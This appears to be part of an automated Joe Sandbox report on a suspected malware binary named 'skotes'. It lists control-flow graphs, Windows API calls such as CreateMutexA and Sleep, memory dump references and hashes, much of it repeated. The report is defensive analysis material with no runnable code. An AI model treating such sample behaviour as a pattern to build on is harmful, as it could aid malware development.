                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2531987475-0
                                                                                                                                                                                                                                                                • Opcode ID: 2b6dced63179d645c770ee9871e6a31a1ce4a3ace2f220751ef77eebb86eff83
                                                                                                                                                                                                                                                                • Instruction ID: 20cc4d53561c8eb08f0f6b54b6ed332be4f0a50a19e42318c4782087e9661b1a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b6dced63179d645c770ee9871e6a31a1ce4a3ace2f220751ef77eebb86eff83
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B413A71904244ABDB28EFB5DD459AFBBF9EF89300B10452EF956D3750FA309900DB61

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 2266 aa9ba5-aa9bc5 GetFileAttributesA 2269 aa9bf3-aa9c0f 2266->2269 2270 aa9bc7-aa9bd3 2266->2270 2273 aa9c3d-aa9c5c 2269->2273 2274 aa9c11-aa9c1d 2269->2274 2271 aa9be9-aa9bf0 call abd663 2270->2271 2272 aa9bd5-aa9be3 2270->2272 2271->2269 2272->2271 2275 aaa91c 2272->2275 2279 aa9c8a-aaa916 call ab80c0 2273->2279 2280 aa9c5e-aa9c6a 2273->2280 2277 aa9c1f-aa9c2d 2274->2277 2278 aa9c33-aa9c3a call abd663 2274->2278 2282 aaa953-aaa987 Sleep CreateMutexA 2275->2282 2283 aaa91c call ad6c6a 2275->2283 2277->2275 2277->2278 2278->2273 2286 aa9c6c-aa9c7a 2280->2286 2287 aa9c80-aa9c87 call abd663 2280->2287 2295 aaa98e-aaa994 2282->2295 2283->2282 2286->2275 2286->2287 2287->2279 2296 aaa996-aaa998 2295->2296 2297 aaa9a7-aaa9a8 2295->2297 2296->2297 2298 aaa99a-aaa9a5 2296->2298 2298->2297 2300 aaa9a9-aaa9b0 call ad6629 2298->2300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00AA9BA8
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                                                                                                                • Opcode ID: cd878a80368c4ed5ca50dc72b8f793ce66f803cfa3157caddafe1c1f09b79dea
                                                                                                                                                                                                                                                                • Instruction ID: 7add56dd563865da6a6fa01cc6e74eb0ea9d8b8734a1d0afea2398fffe0219be
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd878a80368c4ed5ca50dc72b8f793ce66f803cfa3157caddafe1c1f09b79dea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C43157317042049BEB08EB78DD897AFBBB6EF97324F248218E014973D6D7769980C761

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 2303 aa9cda-aa9cfa GetFileAttributesA 2306 aa9d28-aa9d44 2303->2306 2307 aa9cfc-aa9d08 2303->2307 2310 aa9d72-aa9d91 2306->2310 2311 aa9d46-aa9d52 2306->2311 2308 aa9d0a-aa9d18 2307->2308 2309 aa9d1e-aa9d25 call abd663 2307->2309 2308->2309 2314 aaa921 2308->2314 2309->2306 2312 aa9dbf-aaa916 call ab80c0 2310->2312 2313 aa9d93-aa9d9f 2310->2313 2316 aa9d68-aa9d6f call abd663 2311->2316 2317 aa9d54-aa9d62 2311->2317 2319 aa9da1-aa9daf 2313->2319 2320 aa9db5-aa9dbc call abd663 2313->2320 2322 aaa953-aaa987 Sleep CreateMutexA 2314->2322 2323 aaa921 call ad6c6a 2314->2323 2316->2310 2317->2314 2317->2316 2319->2314 2319->2320 2320->2312 2332 aaa98e-aaa994 2322->2332 2323->2322 2333 aaa996-aaa998 2332->2333 2334 aaa9a7-aaa9a8 2332->2334 2333->2334 2335 aaa99a-aaa9a5 2333->2335 2335->2334 2337 aaa9a9-aaa9b0 call ad6629 2335->2337
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00AA9CDD
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                                                                                                                • Opcode ID: 2c96c2d5e190108b1ed5957c824999f255ef613357e5945e47c1328b349c8898
                                                                                                                                                                                                                                                                • Instruction ID: 9fd119e31d1debd9cc3f348374a46837f87507e194b82e01dc6bf169a61ffda7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c96c2d5e190108b1ed5957c824999f255ef613357e5945e47c1328b349c8898
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E03122327142008BEB18ABB8D9887AEB7A6EF86314F244618E014AB3D5D73999C0C751
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00AA9F47
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                                                                                                                • Opcode ID: 17fcf797a30a195c69705edc22fbe573990f99ad25f6e3bdc786c67defc4bcea
                                                                                                                                                                                                                                                                • Instruction ID: ec0475e3862f8acf17a74620b0ffb3fb724e82be1a4ebc583c7dccd2cc6cf4c7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17fcf797a30a195c69705edc22fbe573990f99ad25f6e3bdc786c67defc4bcea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B23175317042008BEB18AB78DD887AEB7A6EF96314F208219F018EB2D5D7369980C752
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00AAA07C
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
